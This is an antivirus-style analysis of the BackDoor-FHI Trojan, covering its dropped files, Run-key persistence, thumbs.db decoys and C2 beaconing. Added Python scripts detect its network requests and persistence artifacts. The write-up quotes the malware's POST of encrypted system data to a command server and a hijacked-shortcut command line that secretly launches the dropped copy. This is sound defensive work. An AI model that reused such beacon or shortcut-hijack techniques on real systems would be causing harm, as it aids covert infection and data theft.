BackDoor-FHI

This page shows the details and results of our analysis of the malware BackDoor-FHI.

Overview

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases:

  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA


Minimum Engine

5600.1067

File Length

Varies

Description Added

2012-08-03

Description Modified

2012-08-29

Characteristics

Upon execution, the Trojan drops a copy of itself to the following path:
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI also drops further copies of itself at random locations, named thumbs.db followed by a single random character (for example thumbs.dbF), so that they resemble the legitimate Windows thumbnail cache file thumbs.db.

The following registry value is added so that the dropped copy runs automatically at startup:

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[Random]\[random].exe /r

The Trojan injects its own code into several running processes and attempts to connect to the following malicious hosts:

  • www.g[Removed]ard.su
  • www.pro[Removed]ection.su
  • www.e[Removed]statics.cc
  • so[Removed]esytems.cc
  • www-pro[Removed]ection.su
  • esto[Removed]e-main.su

Note: the hosts contacted may vary with the geographic location of the system on which the malware runs.

The malware POSTs encrypted system information to the sites above. A captured request looks like the following (the body is truncated):

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: e-statistics.cc
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...
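The request above has several features a network sensor can key on: a POST to /ping.html, a hard-coded Internet Explorer 6 User-Agent with the ".NET CLR 1.0.3705" token, and a form-encoded body consisting of a single opaque parameter z whose value is high-entropy ciphertext. The following Python is an added detection example and is not part of McAfee's description. The sample request is constructed after the excerpt above (the host name and the visible prefix of the z value are taken from it; the Content-Length is adjusted to the shortened body); the length and entropy thresholds are assumptions.

```python
"""Flag BackDoor-FHI-style beacon requests (added example, not McAfee tooling)."""
import math

# Indicators taken from the captured request shown in the advisory
BEACON_PATH = "/ping.html"
LEGACY_UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)"
# Assumed thresholds: ciphertext/base64 scores roughly 5-6 bits per character,
# natural-language form data usually stays below 4.
MIN_BLOB_LEN = 32
MIN_ENTROPY = 4.0


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for the empty string)."""
    if not s:
        return 0.0
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased; header values are stripped."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def beacon_indicators(raw):
    """Return the list of matched indicators for one raw request (empty = clean)."""
    method, path, headers, body = parse_request(raw)
    hits = []
    if method == "POST" and path == BEACON_PATH:
        hits.append("post-to-ping.html")
    if headers.get("user-agent") == LEGACY_UA:
        hits.append("legacy-ie6-user-agent")
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        # Split the body by hand: urllib.parse.parse_qs would turn '+' into a
        # space and drop '=' padding, both of which appear in base64-like blobs.
        params = [p.split("=", 1) for p in body.split("&") if p]
        if len(params) == 1 and params[0][0] == "z":
            blob = params[0][1] if len(params[0]) > 1 else ""
            if len(blob) >= MIN_BLOB_LEN and shannon_entropy(blob) >= MIN_ENTROPY:
                hits.append("single-opaque-z-parameter")
    return hits


# Constructed sample modelled on the captured request above (body shortened).
SAMPLE_REQUEST = (
    "POST /ping.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)\r\n"
    "Host: e-statistics.cc\r\n"
    "Content-Length: 64\r\n"
    "Cache-Control: no-cache\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h"
)

# Constructed benign form post for comparison.
BENIGN_REQUEST = (
    "POST /login HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Host: example.test\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "\r\n"
    "user=alice&password=hunter2"
)

if __name__ == "__main__":
    for label, req in (("sample", SAMPLE_REQUEST), ("benign", BENIGN_REQUEST)):
        print(label, beacon_indicators(req))
```

Each indicator on its own is weak (the IE6 User-Agent string was common in 2012 and /ping.html is not unusual), so a rule should require the full combination, and the entropy test is only meaningful on bodies long enough for the statistic to settle, which is why a minimum length is enforced.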

The malware may also create or modify the .lnk shortcut files of existing documents and applications so that their arguments take a form similar to the following:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

When such a shortcut is used, the dropped thumbs.db copy is launched first and the original target is started afterwards, so the user sees the expected application open.
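The persistence artifacts described in this section (the GUID-named Run value pointing at a random directory under Application Data, the thumbs.db decoy copies, and the hijacked shortcut arguments) can be checked for mechanically. The Python below is an added triage example and is not McAfee's detection logic; it works on data already read from a system (registry Run values as name/data pairs, file names, and shortcut argument strings). The sample values are constructed: the GUID is the one quoted above, while the directory and file names are invented placeholders.

```python
"""Host-side triage for the BackDoor-FHI persistence artifacts (added example)."""
import re

# Run value name: a brace-enclosed GUID, as in the value quoted in the advisory.
GUID_NAME = re.compile(r"^\{[0-9A-F]{8}(?:-[0-9A-F]{4}){3}-[0-9A-F]{12}\}$", re.IGNORECASE)
# Run value data: %UserProfile%\Application Data\<random>\<random>.exe /r, either
# with the environment variable or with an expanded XP-style profile path.
RUN_DATA = re.compile(
    r'^"?(?:%UserProfile%|[A-Z]:\\Documents and Settings\\[^\\]+)'
    r'\\Application Data\\[^\\]+\\[^\\]+\.exe"?\s+/r$',
    re.IGNORECASE)


def suspicious_run_values(values):
    """values: iterable of (name, data) pairs read from HKCU\\...\\CurrentVersion\\Run.
    Returns the pairs that match the BackDoor-FHI naming and path pattern."""
    return [(name, data) for name, data in values
            if GUID_NAME.match(name) and RUN_DATA.match(data)]


# Dropped copies are named thumbs.db plus exactly one extra character; the
# legitimate Windows thumbnail cache is exactly thumbs.db.
DECOY_NAME = re.compile(r"^thumbs\.db.$", re.IGNORECASE)


def is_thumbs_db_decoy(filename):
    return DECOY_NAME.match(filename) is not None


# Hijacked shortcut arguments:
#   cmd.exe /C if exist <decoy> start <decoy> && start "" "<original target>"
LNK_HIJACK = re.compile(
    r'cmd\.exe\s+/C\s+if\s+exist\s+(?P<decoy>\S+)\s+start\s+(?P=decoy)'
    r'\s*&&\s*start\s+""\s+"(?P<orig>[^"]+)"',
    re.IGNORECASE)


def lnk_hijack_target(arguments):
    """Return (decoy_path, original_target) if a shortcut's argument string
    follows the hijack pattern and the decoy is a thumbs.db look-alike, else None."""
    m = LNK_HIJACK.search(arguments)
    if not m:
        return None
    decoy = m.group("decoy")
    if not is_thumbs_db_decoy(decoy.rsplit("\\", 1)[-1]):
        return None
    return decoy, m.group("orig")


# Constructed sample data (directory, file and shortcut names are placeholders).
SAMPLE_RUN_VALUES = [
    ("{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}", r"%UserProfile%\Application Data\Qzkd\Vbrt.exe /r"),
    ("ctfmon.exe", r"C:\WINDOWS\system32\ctfmon.exe"),
]
SAMPLE_LNK_ARGS = (r'/C start cmd.exe /C if exist C:\Docs\thumbs.dbF start C:\Docs\thumbs.dbF'
                   r' && start ""  "C:\Program Files\App\OriginalApp.exe"')

if __name__ == "__main__":
    print(suspicious_run_values(SAMPLE_RUN_VALUES))
    print([n for n in ("thumbs.db", "thumbs.dbF", "Thumbs.dbx") if is_thumbs_db_decoy(n)])
    print(lnk_hijack_target(SAMPLE_LNK_ARGS))
```

Cleaning a hijacked shortcut means restoring the original target returned by lnk_hijack_target rather than deleting the .lnk, which is why the function extracts it; the decoy path it returns is the file to quarantine. Because the decoy check only keys on the name, confirm a hit by hashing the file or checking that it is a PE image rather than a thumbnail database.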

This Trojan is designed to download further malicious content from the sites above and install it on the compromised system.

Symptoms

Presence of the activities described above.

Method of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

Removal

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files for the purpose of hooking system startup will be removed successfully when cleaning with the recommended engine and DAT combination (or higher).

Variants